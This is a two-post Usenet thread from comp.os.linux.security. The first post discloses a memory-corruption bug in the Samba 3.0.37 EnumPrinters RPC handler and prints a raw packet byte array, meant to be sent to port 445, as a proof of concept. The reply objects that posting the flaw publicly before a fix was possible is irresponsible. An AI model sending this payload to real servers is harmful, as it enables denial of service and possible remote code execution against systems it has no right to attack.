Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > comp.os.linux.security > #646 > unrolled thread

[Samba 3.0.37] EnumPrinters memory consumption

Started by"Gabriele Avosani" <g.avosani@gmail.com>
First post2015-05-18 18:56 +0200
Last post2015-05-19 18:04 +0100
Articles 2 — 2 participants

Back to article view | Back to comp.os.linux.security


Contents

  [Samba 3.0.37] EnumPrinters memory consumption "Gabriele Avosani" <g.avosani@gmail.com> - 2015-05-18 18:56 +0200
    Re: [Samba 3.0.37] EnumPrinters memory consumption Richard Kettlewell <rjk@greenend.org.uk> - 2015-05-19 18:04 +0100

#646 — [Samba 3.0.37] EnumPrinters memory consumption

From"Gabriele Avosani" <g.avosani@gmail.com>
Date2015-05-18 18:56 +0200
Subject[Samba 3.0.37] EnumPrinters memory consumption
Message-ID<mjd5k6$594$1@speranza.aioe.org>
Hello,
there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function
(anonymous access), the bug is in parse_prs.c:398, we take control of length
and source pointer of a memcpy, leading to memory corruption, very fast
exhaustion of resources (block of computer very easy) and, probably, remote
code execution.

This is the packet code to be sent to port 445, EnumPrinters rpc function,
opcode 0x0.
char
fr1[]="\x0a\x00\x00\x00\x21\xd3\x9f\x98\x06\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\xd8\x50\x60\x00\x21\x33\x33\x73\x00\x00\x00\x01\x42\x42\x06\x20"
"\x0a\x00\x00\x00\x21\xd3\x9f\x28\x06\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\xd8\x50\x60\x20\x21\x33\x33\x2a\x40\x40\x40\x20\x45\x45\x06\x20"
"\x00\x00"






Gabriele Avosani

P.S. Looking for job as remote programmer (short and long terms). Php, Perl,
Java, C/C++ and more (Linux and Windows), thanks in advance.




[toc] | [next] | [standalone]


#647

FromRichard Kettlewell <rjk@greenend.org.uk>
Date2015-05-19 18:04 +0100
Message-ID<wwv1tic1ou1.fsf@l1AntVDjLrnP7Td3DQJ8ynzIq3lJMueXf87AxnpFoA.invalid>
In reply to#646
"Gabriele Avosani" <g.avosani@gmail.com> writes:
> there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function
> (anonymous access), the bug is in parse_prs.c:398, we take control of length
> and source pointer of a memcpy, leading to memory corruption, very fast
> exhaustion of resources (block of computer very easy) and, probably, remote
> code execution.

samba.org says the latest version is 4.1.something.  If you think that
version is also vulnerable, you should contact the Samba team, ideally
in private.  Posting vulnerabilities to Usenet without allowing any time
for a fix to be deployed is rather irresponsible.

-- 
http://www.greenend.org.uk/rjk/

[toc] | [prev] | [standalone]


Back to top | Article view | comp.os.linux.security


csiph-web